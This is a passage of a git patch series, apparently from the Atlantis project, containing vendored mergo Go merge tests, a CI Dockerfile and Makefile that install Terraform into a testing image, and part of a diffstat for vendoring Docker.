+func TestBackAndForth(t *testing.T) {
+	pt := pointerMapTest{42, 1, &simpleTest{66}}
+	m := make(map[string]interface{})
+	if err := Map(&m, pt); err != nil {
+		t.FailNow()
+	}
+	var (
+		v  interface{}
+		ok bool
+	)
+	if v, ok = m["a"]; v.(int) != pt.A || !ok {
+		t.Fatalf("pt not merged in properly: m[`a`](%d) != pt.A(%d)", v, pt.A)
+	}
+	if v, ok = m["b"]; !ok {
+		t.Fatalf("pt not merged in properly: B is missing in m")
+	}
+	var st *simpleTest
+	if st = v.(*simpleTest); st.Value != 66 {
+		t.Fatalf("something went wrong while mapping pt on m, B wasn't copied")
+	}
+	bpt := pointerMapTest{}
+	if err := Map(&bpt, m); err != nil {
+		t.Fatal(err)
+	}
+	if bpt.A != pt.A {
+		t.Fatalf("pt not merged in properly: bpt.A(%d) != pt.A(%d)", bpt.A, pt.A)
+	}
+	if bpt.hidden == pt.hidden {
+		t.Fatalf("pt unexpectedly merged: bpt.hidden(%d) == pt.hidden(%d)", bpt.hidden, pt.hidden)
+	}
+	if bpt.B.Value != pt.B.Value {
+		t.Fatalf("pt not merged in properly: bpt.B.Value(%d) != pt.B.Value(%d)", bpt.B.Value, pt.B.Value)
+	}
+}
+
+func TestEmbeddedPointerUnpacking(t *testing.T) {
+	tests := []struct{ input pointerMapTest }{
+		{pointerMapTest{42, 1, nil}},
+		{pointerMapTest{42, 1, &simpleTest{66}}},
+	}
+	newValue := 77
+	m := map[string]interface{}{
+		"b": map[string]interface{}{
+			"value": newValue,
+		},
+	}
+	for _, test := range tests {
+		pt := test.input
+		if err := MapWithOverwrite(&pt, m); err != nil {
+			t.FailNow()
+		}
+		if pt.B.Value != newValue {
+			t.Fatalf("pt not mapped properly: pt.A.Value(%d) != m[`b`][`value`](%d)", pt.B.Value, newValue)
+		}
+
+	}
+}
+
+type structWithTimePointer struct {
+	Birth *time.Time
+}
+
+func TestTime(t *testing.T) {
+	now := time.Now()
+	dataStruct := structWithTimePointer{
+		Birth: &now,
+	}
+	dataMap := map[string]interface{}{
+		"Birth": &now,
+	}
+	b := structWithTimePointer{}
+	if err := Merge(&b, dataStruct); err != nil {
+		t.FailNow()
+	}
+	if b.Birth.IsZero() {
+		t.Fatalf("time.Time not merged in properly: b.Birth(%v) != dataStruct['Birth'](%v)", b.Birth, dataStruct.Birth)
+	}
+	if b.Birth != dataStruct.Birth {
+		t.Fatalf("time.Time not merged in properly: b.Birth(%v) != dataStruct['Birth'](%v)", b.Birth, dataStruct.Birth)
+	}
+	b = structWithTimePointer{}
+	if err := Map(&b, dataMap); err != nil {
+		t.FailNow()
+	}
+	if b.Birth.IsZero() {
+		t.Fatalf("time.Time not merged in properly: b.Birth(%v) != dataMap['Birth'](%v)", b.Birth, dataMap["Birth"])
+	}
+}
+
+type simpleNested struct {
+	A int
+}
+
+type structWithNestedPtrValueMap struct {
+	NestedPtrValue map[string]*simpleNested
+}
+
+func TestNestedPtrValueInMap(t *testing.T) {
+	src := &structWithNestedPtrValueMap{
+		NestedPtrValue: map[string]*simpleNested{
+			"x": {
+				A: 1,
+			},
+		},
+	}
+	dst := &structWithNestedPtrValueMap{
+		NestedPtrValue: map[string]*simpleNested{
+			"x": {},
+		},
+	}
+	if err := Map(dst, src); err != nil {
+		t.FailNow()
+	}
+	if dst.NestedPtrValue["x"].A == 0 {
+		t.Fatalf("Nested Ptr value not merged in properly: dst.NestedPtrValue[\"x\"].A(%v) != src.NestedPtrValue[\"x\"].A(%v)", dst.NestedPtrValue["x"].A, src.NestedPtrValue["x"].A)
+	}
+}
+
+func loadYAML(path string) (m map[string]interface{}) {
+	m = make(map[string]interface{})
+	raw, _ := ioutil.ReadFile(path)
+	_ = yaml.Unmarshal(raw, &m)
+	return
+}
+
+type structWithMap struct {
+	m map[string]structWithUnexportedProperty
+}
+
+type structWithUnexportedProperty struct {
+	s string
+}
+
+func TestUnexportedProperty(t *testing.T) {
+	a := structWithMap{map[string]structWithUnexportedProperty{
+		"key": {"hello"},
+	}}
+	b := structWithMap{map[string]structWithUnexportedProperty{
+		"key": {"hi"},
+	}}
+	defer func() {
+		if r := recover(); r != nil {
+			t.Errorf("Should not have panicked")
+		}
+	}()
+	Merge(&a, b)
+}
+
+type structWithBoolPointer struct {
+	C *bool
+}
+
+func TestBooleanPointer(t *testing.T) {
+	bt, bf := true, false
+	src := structWithBoolPointer{
+		&bt,
+	}
+	dst := structWithBoolPointer{
+		&bf,
+	}
+	if err := Merge(&dst, src); err != nil {
+		t.FailNow()
+	}
+	if dst.C == src.C {
+		t.Fatalf("dst.C should be a different pointer than src.C")
+	}
+	if *dst.C != *src.C {
+		t.Fatalf("dst.C should be true")
+	}
+}
diff --git a/vendor/github.com/imdario/mergo/pr80_test.go b/vendor/github.com/imdario/mergo/pr80_test.go
new file mode 100644
index 0000000000..0b3220f3bc
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/pr80_test.go
@@ -0,0 +1,18 @@
+package mergo
+
+import (
+	"testing"
+)
+
+type mapInterface map[string]interface{}
+
+func TestMergeMapsEmptyString(t *testing.T) {
+	a := mapInterface{"s": ""}
+	b := mapInterface{"s": "foo"}
+	if err := Merge(&a, b); err != nil {
+		t.Fatal(err)
+	}
+	if a["s"] != "foo" {
+		t.Fatalf("b not merged in properly: a.s.Value(%s) != expected(%s)", a["s"], "foo")
+	}
+}
diff --git a/vendor/github.com/imdario/mergo/pr81_test.go b/vendor/github.com/imdario/mergo/pr81_test.go
new file mode 100644
index 0000000000..e90e923feb
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/pr81_test.go
@@ -0,0 +1,42 @@
+package mergo
+
+import (
+	"testing"
+)
+
+func TestMapInterfaceWithMultipleLayer(t *testing.T) {
+	m1 := map[string]interface{}{
+		"k1": map[string]interface{}{
+			"k1.1": "v1",
+		},
+	}
+
+	m2 := map[string]interface{}{
+		"k1": map[string]interface{}{
+			"k1.1": "v2",
+			"k1.2": "v3",
+		},
+	}
+
+	if err := Map(&m1, m2, WithOverride); err != nil {
+		t.Fatalf("Error merging: %v", err)
+	}
+
+	// Check overwrite of sub map works
+	expected := "v2"
+	actual := m1["k1"].(map[string]interface{})["k1.1"].(string)
+	if actual != expected {
+		t.Fatalf("Expected %v but got %v",
+			expected,
+			actual)
+	}
+
+	// Check new key is merged
+	expected = "v3"
+	actual = m1["k1"].(map[string]interface{})["k1.2"].(string)
+	if actual != expected {
+		t.Fatalf("Expected %v but got %v",
+			expected,
+			actual)
+	}
+}
diff --git a/vendor/github.com/imdario/mergo/testdata/license.yml b/vendor/github.com/imdario/mergo/testdata/license.yml
new file mode 100644
index 0000000000..2f1ad0082b
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/testdata/license.yml
@@ -0,0 +1,4 @@
+import: ../../../../fossene/db/schema/thing.yml
+fields:
+    site: string
+    author: root
diff --git a/vendor/github.com/imdario/mergo/testdata/thing.yml b/vendor/github.com/imdario/mergo/testdata/thing.yml
new file mode 100644
index 0000000000..1a71041250
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/testdata/thing.yml
@@ -0,0 +1,6 @@
+fields:
+    id: int
+    name: string
+    parent: ref "datu:thing"
+    status: enum(draft, public, private)
+    author: updater

From 3c9188b2b84a7cc277cc49dda8dd8cb9f88cd9c7 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Wed, 20 Jun 2018 11:09:02 +0100
Subject: [PATCH 32/69] Add unit test image

---
 .circleci/config.yml |  2 +-
 Gopkg.lock           |  2 +-
 Gopkg.toml           |  4 ++++
 testing/Dockerfile   | 12 ++++++++++++
 testing/Makefile     | 11 +++++++++++
 5 files changed, 29 insertions(+), 2 deletions(-)
 create mode 100644 testing/Dockerfile
 create mode 100644 testing/Makefile

diff --git a/.circleci/config.yml b/.circleci/config.yml
index a632082603..50fb04e89c 100644
--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -3,7 +3,7 @@ jobs:
   test:
     working_directory: /go/src/github.com/runatlantis/atlantis
     docker:
-    - image: circleci/golang:1.10
+    - image: runatlantis/testing-env
     steps:
     - checkout
     - run: make test-coverage
diff --git a/Gopkg.lock b/Gopkg.lock
index dc144cf25f..08daf551c6 100644
--- a/Gopkg.lock
+++ b/Gopkg.lock
@@ -352,6 +352,6 @@
 [solve-meta]
   analyzer-name = "dep"
   analyzer-version = 1
-  inputs-digest = "148489fcbc8e0f37944adc0eb2f9f187995790c5107188e9f4bebb79f7989434"
+  inputs-digest = "41fa7bc4fc730240930807e113d19be175d2a8dfbca5cdf084e8285a3a150e43"
   solver-name = "gps-cdcl"
   solver-version = 1
diff --git a/Gopkg.toml b/Gopkg.toml
index 749d2f189b..1d0d53b35e 100644
--- a/Gopkg.toml
+++ b/Gopkg.toml
@@ -96,3 +96,7 @@
 [[constraint]]
   branch = "master"
   name = "github.com/flynn-archive/go-shlex"
+
+[[constraint]]
+  name = "github.com/docker/docker"
+  version = "1.13.1"
diff --git a/testing/Dockerfile b/testing/Dockerfile
new file mode 100644
index 0000000000..b52eb89868
--- /dev/null
+++ b/testing/Dockerfile
@@ -0,0 +1,12 @@
+# This Dockerfile builds the docker image used for running circle ci tests.
+# We need terraform installed for our full test suite so it installs that.
+# It's updated by running make build-testing-image
+FROM circleci/golang:1.10
+
+# Install Terraform
+ENV TERRAFORM_VERSION=0.11.7
+RUN curl -LOks https://releases.hashicorp.com/terraform/${TERRAFORM_VERSION}/terraform_${TERRAFORM_VERSION}_linux_amd64.zip && \
+    sudo mkdir -p /usr/local/bin/tf/versions/${TERRAFORM_VERSION} && \
+    sudo unzip terraform_${TERRAFORM_VERSION}_linux_amd64.zip -d /usr/local/bin/tf/versions/${TERRAFORM_VERSION} && \
+    sudo ln -s /usr/local/bin/tf/versions/${TERRAFORM_VERSION}/terraform /usr/local/bin/terraform && \
+    rm terraform_${TERRAFORM_VERSION}_linux_amd64.zip
diff --git a/testing/Makefile b/testing/Makefile
new file mode 100644
index 0000000000..49a5387eca
--- /dev/null
+++ b/testing/Makefile
@@ -0,0 +1,11 @@
+TEST_IMAGE_NAME := runatlantis/testing-env
+
+.DEFAULT_GOAL := help
+help: ## List targets & descriptions
+	@cat Makefile* | grep -E '^[a-zA-Z_-]+:.*?## .*$$' | sort | awk 'BEGIN {FS = ":.*?## "}; {printf "\033[36m%-30s\033[0m %s\n", $$1, $$2}'
+
+build-testing-image: ## Build and push the testing image
+	docker build -t $(TEST_IMAGE_NAME):$$(git rev-parse HEAD) .
+	docker tag $(TEST_IMAGE_NAME):$$(git rev-parse HEAD) $(TEST_IMAGE_NAME):latest
+	docker push $(TEST_IMAGE_NAME):$$(git rev-parse HEAD)
+	docker push $(TEST_IMAGE_NAME):latest

From 07ff6972ebc6c915c8761765b11da95832091665 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Wed, 20 Jun 2018 11:35:41 +0100
Subject: [PATCH 33/69] Vendor docker

---
 Gopkg.lock                                    |   18 +-
 Gopkg.toml                                    |    2 +-
 vendor/github.com/docker/docker/.DEREK.yml    |   17 +
 vendor/github.com/docker/docker/.dockerignore |    3 +
 .../docker/docker/.github/CODEOWNERS          |   20 +
 .../docker/docker/.github/ISSUE_TEMPLATE.md   |   12 +-
 .../docker/.github/PULL_REQUEST_TEMPLATE.md   |    2 +-
 vendor/github.com/docker/docker/.gitignore    |   19 +-
 vendor/github.com/docker/docker/.mailmap      |  674 +-
 vendor/github.com/docker/docker/AUTHORS       |  572 +-
 vendor/github.com/docker/docker/CHANGELOG.md  |  290 +-
 .../github.com/docker/docker/CONTRIBUTING.md  |  191 +-
 vendor/github.com/docker/docker/Dockerfile    |  380 +-
 .../docker/docker/Dockerfile.aarch64          |  175 -
 .../github.com/docker/docker/Dockerfile.armhf |  182 -
 .../github.com/docker/docker/Dockerfile.e2e   |   74 +
 .../docker/docker/Dockerfile.ppc64le          |  188 -
 .../github.com/docker/docker/Dockerfile.s390x |  190 -
 .../docker/docker/Dockerfile.simple           |   37 +-
 .../docker/docker/Dockerfile.solaris          |   20 -
 .../docker/docker/Dockerfile.windows          |   57 +-
 vendor/github.com/docker/docker/LICENSE       |    2 +-
 vendor/github.com/docker/docker/MAINTAINERS   |  176 +-
 vendor/github.com/docker/docker/Makefile      |  124 +-
 vendor/github.com/docker/docker/NOTICE        |    2 +-
 vendor/github.com/docker/docker/README.md     |  309 +-
 vendor/github.com/docker/docker/ROADMAP.md    |  122 +-
 vendor/github.com/docker/docker/TESTING.md    |   71 +
 vendor/github.com/docker/docker/VENDORING.md  |   11 +-
 vendor/github.com/docker/docker/VERSION       |    1 -
 vendor/github.com/docker/docker/api/README.md |   16 +-
 vendor/github.com/docker/docker/api/common.go |  161 +-
 .../docker/docker/api/common_test.go          |  341 -
 .../docker/docker/api/common_unix.go          |    4 +-
 .../docker/docker/api/common_windows.go       |    4 +-
 .../docker/docker/api/errors/errors.go        |   47 -
 .../api/server/backend/build/backend.go       |  136 +
 .../docker/api/server/backend/build/tag.go    |   77 +
 .../docker/api/server/httputils/decoder.go    |    2 +-
 .../docker/api/server/httputils/errors.go     |  126 +-
 .../docker/api/server/httputils/form.go       |   35 +-
 .../docker/api/server/httputils/form_test.go  |    4 +-
 .../docker/api/server/httputils/httputils.go  |   46 +-
 .../api/server/httputils/httputils_test.go    |   18 +
 .../server/httputils/httputils_write_json.go  |    4 +-
 .../httputils/httputils_write_json_go16.go    |   16 -
 .../api/server/httputils/write_log_stream.go  |   84 +
 .../docker/docker/api/server/middleware.go    |    4 +-
 .../docker/api/server/middleware/cors.go      |    6 +-
 .../docker/api/server/middleware/debug.go     |   34 +-
 .../api/server/middleware/debug_test.go       |   59 +
 .../api/server/middleware/experimental.go     |    5 +-
 .../api/server/middleware/middleware.go       |    5 +-
 .../docker/api/server/middleware/version.go   |   35 +-
 .../api/server/middleware/version_test.go     |   71 +-
 .../docker/docker/api/server/profiler.go      |   41 -
 .../docker/api/server/router/build/backend.go |   22 +-
 .../docker/api/server/router/build/build.go   |   13 +-
 .../api/server/router/build/build_routes.go   |  307 +-
 .../api/server/router/checkpoint/backend.go   |    2 +-
 .../server/router/checkpoint/checkpoint.go    |    8 +-
 .../router/checkpoint/checkpoint_routes.go    |    4 +-
 .../api/server/router/container/backend.go    |   24 +-
 .../api/server/router/container/container.go  |   19 +-
 .../router/container/container_routes.go      |  207 +-
 .../api/server/router/container/copy.go       |   65 +-
 .../api/server/router/container/exec.go       |   23 +-
 .../api/server/router/container/inspect.go    |    4 +-
 .../docker/api/server/router/debug/debug.go   |   53 +
 .../api/server/router/debug/debug_routes.go   |   12 +
 .../api/server/router/distribution/backend.go |   15 +
 .../router/distribution/distribution.go       |   31 +
 .../distribution/distribution_routes.go       |  138 +
 .../docker/api/server/router/experimental.go  |   21 +-
 .../docker/api/server/router/image/backend.go |   23 +-
 .../docker/api/server/router/image/image.go   |   18 +-
 .../api/server/router/image/image_routes.go   |  162 +-
 .../docker/docker/api/server/router/local.go  |   44 +-
 .../api/server/router/network/backend.go      |   20 +-
 .../api/server/router/network/filter.go       |   49 +-
 .../api/server/router/network/filter_test.go  |  149 +
 .../api/server/router/network/network.go      |   17 +-
 .../server/router/network/network_routes.go   |  353 +-
 .../api/server/router/plugin/backend.go       |   12 +-
 .../docker/api/server/router/plugin/plugin.go |    8 +-
 .../api/server/router/plugin/plugin_routes.go |   68 +-
 .../docker/docker/api/server/router/router.go |    2 +-
 .../api/server/router/session/backend.go      |   11 +
 .../api/server/router/session/session.go      |   29 +
 .../server/router/session/session_routes.go   |   16 +
 .../docker/api/server/router/swarm/backend.go |   30 +-
 .../docker/api/server/router/swarm/cluster.go |   15 +-
 .../api/server/router/swarm/cluster_routes.go |  206 +-
 .../docker/api/server/router/swarm/helpers.go |   66 +
 .../api/server/router/system/backend.go       |   13 +-
 .../docker/api/server/router/system/system.go |   25 +-
 .../api/server/router/system/system_routes.go |   70 +-
 .../api/server/router/volume/backend.go       |   15 +-
 .../docker/api/server/router/volume/volume.go |    4 +-
 .../api/server/router/volume/volume_routes.go |   34 +-
 .../docker/api/server/router_swapper.go       |    2 +-
 .../docker/docker/api/server/server.go        |   61 +-
 .../docker/docker/api/server/server_test.go   |    7 +-
 .../github.com/docker/docker/api/swagger.yaml | 4153 ++++++++---
 .../api/templates/server/operation.gotmpl     |    4 +-
 .../docker/docker/api/types/auth.go           |    2 +-
 .../docker/api/types/backend/backend.go       |   86 +-
 .../docker/docker/api/types/backend/build.go  |   44 +
 .../docker/docker/api/types/blkiodev/blkio.go |    2 +-
 .../docker/docker/api/types/client.go         |   96 +-
 .../docker/docker/api/types/configs.go        |   16 +-
 .../docker/api/types/container/config.go      |   13 +-
 .../api/types/container/container_changes.go  |   21 +
 .../api/types/container/container_create.go   |    4 +-
 .../api/types/container/container_top.go      |   21 +
 .../api/types/container/container_update.go   |    4 +-
 .../api/types/container/container_wait.go     |   16 +-
 .../docker/api/types/container/host_config.go |  127 +-
 .../api/types/container/hostconfig_unix.go    |   42 +-
 .../api/types/container/hostconfig_windows.go |   55 +-
 .../api/types/container/waitcondition.go      |   22 +
 .../docker/docker/api/types/events/events.go  |   12 +-
 .../docker/api/types/filters/example_test.go  |   24 +
 .../docker/docker/api/types/filters/parse.go  |  274 +-
 .../docker/api/types/filters/parse_test.go    |  176 +-
 .../docker/api/types/graph_driver_data.go     |   17 +
 .../docker/api/types/image/image_history.go   |   37 +
 .../api/types/image_delete_response_item.go   |   15 +
 .../docker/docker/api/types/mount/mount.go    |   27 +-
 .../docker/api/types/network/network.go       |   53 +-
 .../docker/docker/api/types/plugin.go         |   16 +-
 .../docker/api/types/plugin_responses.go      |   25 +-
 .../api/types/plugins/logdriver/entry.pb.go   |  449 ++
 .../api/types/plugins/logdriver/entry.proto   |    8 +
 .../docker/api/types/plugins/logdriver/gen.go |    3 +
 .../docker/api/types/plugins/logdriver/io.go  |   87 +
 .../docker/docker/api/types/port.go           |    2 +-
 .../api/types/reference/image_reference.go    |   34 -
 .../types/reference/image_reference_test.go   |   72 -
 .../docker/api/types/registry/authenticate.go |    4 +-
 .../docker/api/types/registry/registry.go     |   23 +-
 .../docker/docker/api/types/seccomp.go        |    4 +-
 .../docker/docker/api/types/stats.go          |    5 +-
 .../docker/api/types/strslice/strslice.go     |    2 +-
 .../api/types/strslice/strslice_test.go       |    2 +-
 .../docker/docker/api/types/swarm/common.go   |   19 +-
 .../docker/docker/api/types/swarm/config.go   |   35 +
 .../docker/api/types/swarm/container.go       |   36 +-
 .../docker/docker/api/types/swarm/network.go  |   26 +-
 .../docker/docker/api/types/swarm/node.go     |    3 +-
 .../docker/docker/api/types/swarm/runtime.go  |   27 +
 .../docker/api/types/swarm/runtime/gen.go     |    3 +
 .../api/types/swarm/runtime/plugin.pb.go      |  712 ++
 .../api/types/swarm/runtime/plugin.proto      |   20 +
 .../docker/docker/api/types/swarm/secret.go   |    9 +-
 .../docker/docker/api/types/swarm/service.go  |   39 +-
 .../docker/docker/api/types/swarm/swarm.go    |   32 +-
 .../docker/docker/api/types/swarm/task.go     |   93 +-
 .../docker/api/types/time/duration_convert.go |    2 +-
 .../api/types/time/duration_convert_test.go   |    2 +-
 .../docker/docker/api/types/time/timestamp.go |   19 +-
 .../docker/api/types/time/timestamp_test.go   |    6 +-
 .../docker/docker/api/types/types.go          |  179 +-
 .../docker/api/types/versions/README.md       |    4 +-
 .../docker/api/types/versions/compare.go      |    2 +-
 .../docker/api/types/versions/compare_test.go |    2 +-
 .../docker/api/types/versions/v1p19/types.go  |    2 +-
 .../docker/api/types/versions/v1p20/types.go  |    2 +-
 .../docker/docker/api/types/volume.go         |   17 +-
 .../{volumes_create.go => volume_create.go}   |    8 +-
 .../{volumes_list.go => volume_list.go}       |    8 +-
 .../adapters/containerimage/pull.go           |  724 ++
 .../builder-next/adapters/snapshot/layer.go   |  113 +
 .../adapters/snapshot/snapshot.go             |  445 ++
 .../docker/builder/builder-next/builder.go    |  419 ++
 .../docker/builder/builder-next/controller.go |  157 +
 .../builder/builder-next/executor_unix.go     |   17 +
 .../builder/builder-next/executor_windows.go  |   21 +
 .../builder/builder-next/exporter/export.go   |  146 +
 .../builder/builder-next/exporter/writer.go   |  177 +
 .../builder/builder-next/reqbodyhandler.go    |   67 +
 .../builder/builder-next/worker/worker.go     |  323 +
 .../docker/docker/builder/builder.go          |  170 +-
 .../docker/docker/builder/context.go          |  260 -
 .../docker/docker/builder/context_test.go     |  307 -
 .../docker/docker/builder/context_unix.go     |   11 -
 .../docker/docker/builder/context_windows.go  |   17 -
 .../docker/docker/builder/dockerfile/bflag.go |  176 -
 .../docker/builder/dockerfile/bflag_test.go   |  187 -
 .../docker/builder/dockerfile/buildargs.go    |  172 +
 .../builder/dockerfile/buildargs_test.go      |  102 +
 .../docker/builder/dockerfile/builder.go      |  547 +-
 .../docker/builder/dockerfile/builder_unix.go |    6 +-
 .../builder/dockerfile/builder_windows.go     |    9 +-
 .../builder/dockerfile/clientsession.go       |   76 +
 .../builder/dockerfile/command/command.go     |   46 -
 .../builder/dockerfile/containerbackend.go    |  146 +
 .../docker/docker/builder/dockerfile/copy.go  |  560 ++
 .../docker/builder/dockerfile/copy_test.go    |  148 +
 .../docker/builder/dockerfile/copy_unix.go    |   48 +
 .../docker/builder/dockerfile/copy_windows.go |   43 +
 .../docker/builder/dockerfile/dispatchers.go  |  920 +--
 .../builder/dockerfile/dispatchers_test.go    |  719 +-
 .../builder/dockerfile/dispatchers_unix.go    |   16 +-
 .../dockerfile/dispatchers_unix_test.go       |   17 +-
 .../builder/dockerfile/dispatchers_windows.go |   57 +-
 .../dockerfile/dispatchers_windows_test.go    |   50 +-
 .../docker/builder/dockerfile/envVarTest      |  116 -
 .../docker/builder/dockerfile/evaluator.go    |  396 +-
 .../builder/dockerfile/evaluator_test.go      |  171 +-
 .../builder/dockerfile/evaluator_unix.go      |    9 -
 .../builder/dockerfile/evaluator_windows.go   |   13 -
 .../docker/builder/dockerfile/imagecontext.go |  121 +
 .../docker/builder/dockerfile/imageprobe.go   |   63 +
 .../docker/builder/dockerfile/internals.go    |  870 +--
 .../builder/dockerfile/internals_linux.go     |   88 +
 .../dockerfile/internals_linux_test.go        |  138 +
 .../builder/dockerfile/internals_test.go      |  130 +-
 .../builder/dockerfile/internals_unix.go      |   38 -
 .../builder/dockerfile/internals_windows.go   |   67 +-
 .../dockerfile/internals_windows_test.go      |   40 +-
 .../docker/builder/dockerfile/metrics.go      |   44 +
 .../builder/dockerfile/mockbackend_test.go    |  148 +
 .../builder/dockerfile/parser/dumper/main.go  |   36 -
 .../builder/dockerfile/parser/json_test.go    |   61 -
 .../builder/dockerfile/parser/line_parsers.go |  361 -
 .../builder/dockerfile/parser/parser.go       |  221 -
 .../builder/dockerfile/parser/parser_test.go  |  173 -
 .../parser/testfile-line/Dockerfile           |   35 -
 .../env_no_value/Dockerfile                   |    3 -
 .../shykes-nested-json/Dockerfile             |    1 -
 .../testfiles/ADD-COPY-with-JSON/Dockerfile   |   11 -
 .../testfiles/ADD-COPY-with-JSON/result       |   10 -
 .../testfiles/brimstone-consuldock/Dockerfile |   26 -
 .../testfiles/brimstone-consuldock/result     |    5 -
 .../brimstone-docker-consul/Dockerfile        |   52 -
 .../testfiles/brimstone-docker-consul/result  |    9 -
 .../testfiles/continueIndent/Dockerfile       |   36 -
 .../parser/testfiles/continueIndent/result    |   10 -
 .../testfiles/cpuguy83-nagios/Dockerfile      |   54 -
 .../parser/testfiles/cpuguy83-nagios/result   |   40 -
 .../parser/testfiles/docker/Dockerfile        |  103 -
 .../dockerfile/parser/testfiles/docker/result |   24 -
 .../parser/testfiles/env/Dockerfile           |   23 -
 .../dockerfile/parser/testfiles/env/result    |   16 -
 .../testfiles/escape-after-comment/Dockerfile |    9 -
 .../testfiles/escape-after-comment/result     |    3 -
 .../testfiles/escape-nonewline/Dockerfile     |    7 -
 .../parser/testfiles/escape-nonewline/result  |    3 -
 .../parser/testfiles/escape/Dockerfile        |    6 -
 .../dockerfile/parser/testfiles/escape/result |    3 -
 .../parser/testfiles/escapes/Dockerfile       |   14 -
 .../parser/testfiles/escapes/result           |    6 -
 .../parser/testfiles/flags/Dockerfile         |   10 -
 .../dockerfile/parser/testfiles/flags/result  |   10 -
 .../parser/testfiles/health/Dockerfile        |   10 -
 .../dockerfile/parser/testfiles/health/result |    9 -
 .../parser/testfiles/influxdb/Dockerfile      |   15 -
 .../parser/testfiles/influxdb/result          |   11 -
 .../Dockerfile                                |    1 -
 .../result                                    |    1 -
 .../Dockerfile                                |    1 -
 .../result                                    |    1 -
 .../Dockerfile                                |    1 -
 .../jeztah-invalid-json-single-quotes/result  |    1 -
 .../Dockerfile                                |    1 -
 .../result                                    |    1 -
 .../Dockerfile                                |    1 -
 .../result                                    |    1 -
 .../parser/testfiles/json/Dockerfile          |    8 -
 .../dockerfile/parser/testfiles/json/result   |    8 -
 .../kartar-entrypoint-oddities/Dockerfile     |    7 -
 .../kartar-entrypoint-oddities/result         |    7 -
 .../lk4d4-the-edge-case-generator/Dockerfile  |   48 -
 .../lk4d4-the-edge-case-generator/result      |   29 -
 .../parser/testfiles/mail/Dockerfile          |   16 -
 .../dockerfile/parser/testfiles/mail/result   |   14 -
 .../testfiles/multiple-volumes/Dockerfile     |    3 -
 .../parser/testfiles/multiple-volumes/result  |    2 -
 .../parser/testfiles/mumble/Dockerfile        |    7 -
 .../dockerfile/parser/testfiles/mumble/result |    4 -
 .../parser/testfiles/nginx/Dockerfile         |   14 -
 .../dockerfile/parser/testfiles/nginx/result  |   11 -
 .../parser/testfiles/tf2/Dockerfile           |   23 -
 .../dockerfile/parser/testfiles/tf2/result    |   20 -
 .../parser/testfiles/weechat/Dockerfile       |    9 -
 .../parser/testfiles/weechat/result           |    6 -
 .../parser/testfiles/znc/Dockerfile           |    7 -
 .../dockerfile/parser/testfiles/znc/result    |    5 -
 .../docker/builder/dockerfile/parser/utils.go |  176 -
 .../docker/builder/dockerfile/shell_parser.go |  329 -
 .../builder/dockerfile/shell_parser_test.go   |  155 -
 .../docker/builder/dockerfile/support.go      |   19 -
 .../docker/builder/dockerfile/support_test.go |   65 -
 .../docker/builder/dockerfile/utils_test.go   |    2 +-
 .../docker/builder/dockerfile/wordsTest       |   25 -
 .../docker/docker/builder/dockerignore.go     |   48 -
 .../builder/dockerignore/dockerignore.go      |   21 +-
 .../builder/dockerignore/dockerignore_test.go |   28 +-
 .../docker/docker/builder/fscache/fscache.go  |  652 ++
 .../docker/builder/fscache/fscache_test.go    |  132 +
 .../docker/builder/fscache/naivedriver.go     |   28 +
 .../github.com/docker/docker/builder/git.go   |   28 -
 .../docker/docker/builder/remote.go           |  157 -
 .../docker/builder/remotecontext/archive.go   |  125 +
 .../docker/builder/remotecontext/detect.go    |  180 +
 .../detect_test.go}                           |   48 +-
 .../docker/builder/remotecontext/filehash.go  |   45 +
 .../docker/builder/remotecontext/generate.go  |    3 +
 .../docker/builder/remotecontext/git.go       |   35 +
 .../builder/remotecontext/git/gitutils.go     |  204 +
 .../remotecontext/git/gitutils_test.go        |  278 +
 .../builder/remotecontext/lazycontext.go      |  102 +
 .../remotecontext}/mimetype.go                |   15 +-
 .../builder/remotecontext/mimetype_test.go    |   16 +
 .../docker/builder/remotecontext/remote.go    |  127 +
 .../{ => remotecontext}/remote_test.go        |  127 +-
 .../docker/builder/remotecontext/tarsum.go    |  157 +
 .../docker/builder/remotecontext/tarsum.pb.go |  525 ++
 .../docker/builder/remotecontext/tarsum.proto |    7 +
 .../builder/remotecontext/tarsum_test.go      |  151 +
 .../builder/{ => remotecontext}/utils_test.go |   34 +-
 .../docker/docker/builder/tarsum.go           |  158 -
 .../docker/docker/builder/tarsum_test.go      |  265 -
 vendor/github.com/docker/docker/cli/cobra.go  |   42 +-
 .../cli/command/bundlefile/bundlefile.go      |   69 -
 .../cli/command/bundlefile/bundlefile_test.go |   77 -
 .../docker/cli/command/checkpoint/cmd.go      |   24 -
 .../docker/cli/command/checkpoint/create.go   |   58 -
 .../docker/cli/command/checkpoint/list.go     |   62 -
 .../docker/cli/command/checkpoint/remove.go   |   44 -
 .../docker/docker/cli/command/cli.go          |  260 -
 .../docker/cli/command/commands/commands.go   |   91 -
 .../docker/cli/command/container/attach.go    |  130 -
 .../docker/cli/command/container/cmd.go       |   46 -
 .../docker/cli/command/container/commit.go    |   76 -
 .../docker/docker/cli/command/container/cp.go |  303 -
 .../docker/cli/command/container/create.go    |  218 -
 .../docker/cli/command/container/diff.go      |   58 -
 .../docker/cli/command/container/exec.go      |  207 -
 .../docker/cli/command/container/exec_test.go |  116 -
 .../docker/cli/command/container/export.go    |   59 -
 .../docker/cli/command/container/hijack.go    |  116 -
 .../docker/cli/command/container/inspect.go   |   47 -
 .../docker/cli/command/container/kill.go      |   56 -
 .../docker/cli/command/container/list.go      |  141 -
 .../docker/cli/command/container/logs.go      |   87 -
 .../docker/cli/command/container/pause.go     |   49 -
 .../docker/cli/command/container/port.go      |   78 -
 .../docker/cli/command/container/prune.go     |   75 -
 .../docker/cli/command/container/ps_test.go   |  118 -
 .../docker/cli/command/container/rename.go    |   51 -
 .../docker/cli/command/container/restart.go   |   62 -
 .../docker/docker/cli/command/container/rm.go |   73 -
 .../docker/cli/command/container/run.go       |  285 -
 .../docker/cli/command/container/start.go     |  179 -
 .../docker/cli/command/container/stats.go     |  243 -
 .../cli/command/container/stats_helpers.go    |  226 -
 .../cli/command/container/stats_unit_test.go  |   20 -
 .../docker/cli/command/container/stop.go      |   67 -
 .../docker/cli/command/container/top.go       |   58 -
 .../docker/cli/command/container/tty.go       |  103 -
 .../docker/cli/command/container/unpause.go   |   50 -
